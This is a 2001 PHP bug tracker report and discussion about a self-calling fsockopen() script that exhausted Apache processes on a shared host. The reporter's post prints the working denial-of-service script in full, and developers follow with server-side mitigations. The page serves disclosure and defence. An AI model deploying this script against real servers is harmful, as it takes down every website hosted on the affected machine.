php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #14372 fsockopen() timeout terror
Submitted: 2001-12-07 02:33 UTC Modified: 2001-12-13 07:03 UTC
From: phil_3iem at yahoo dot com Assigned:
Status: Not a bug Package: Apache related
PHP Version: 4.0.6 OS: FreeBSD 4.4-Stable
Private report: No CVE-ID: None
View Add Comment Developer Edit
 [2001-12-07 02:33 UTC] phil_3iem at yahoo dot com 
We have had users on our system using their PHP scripts to take down our Apache servers.  The script uses fsockopen() to call the page that issues the fsockopen() function. When the script calls itself the sever gets into a loop of death, spawning as many connections as httpd.conf will allow. Any incoming connections from then on just hang and all the websites hosted on that machine are down.  Here is and script that uses this problem to attack Apache.

<?php

$fp = fsockopen ($HTTP_HOST, $SERVER_PORT, $errno, $errstr, 30);
if (!$fp)
{
  echo "$errstr ($errno)<br>\n";
}
else
{
  fputs ($fp, "GET $REQUEST_URI HTTP/1.0\r\nHost: $HTTP_HOST\r\n\r\n");

  while (!feof($fp))
  {
    echo fgets ($fp,128);
  }

  fclose ($fp);
}

?>


Please fix this. We really had a hard time finding the person responsible for doing this.  They had the script in their home "public_html" directory and the only clue we had was that in the Apache logs it was always the last page accessed before the server freaked out and spawned over 150 Apache processes. 


Thanks,

pHil Cogbill

3iem.net

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2001-12-07 03:18 UTC] mfischer@php.net 
You just can't fix this issue without prohibiting to call fsockopen().

Think yourself again, how can this be fixed? You can disallow http open_wrappers for sure. The real fix is to remove the user.

There's no bug and nothing to fix -> Bogus.
 [2001-12-09 13:17 UTC] rasmus@php.net 
Just to add to this.  The way to fix it at the ISP level is to simply put "disable_functions = fsockopen" in your php.ini file.  Also make sure you turn off "allow_url_fopen" since this feature can also be used to do something like this.
 [2001-12-13 07:03 UTC] daniel@php.net 
disable this functions will make PHP useless and disabling these functions in PHP doesn't prevent your customers from doing the same thing in Perl or C.

What you experienced was a standard DoS attack, thus the problem should be solved at apache level. Limiting the number of connections per IP sounds like a good idea, doesn't it? 

mod_throttle looks like a good solution:

  http://www.snert.com/Software/mod_throttle/index.shtml

"Request" combined with "ThrottleClientIP" should solve your problem (although I have never tested this module).

an alternative would be to limit the number of connections a virtual host can receive:

  http://httpd.apache.org/docs/mod/core.html#maxclients

.. which would only give a limited amount of protection, because the potential hacker would just DoS many virtual hosts at the same time.

Kind Regards,
  Daniel Lorch
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Sun Jun 16 19:01:30 2024 UTC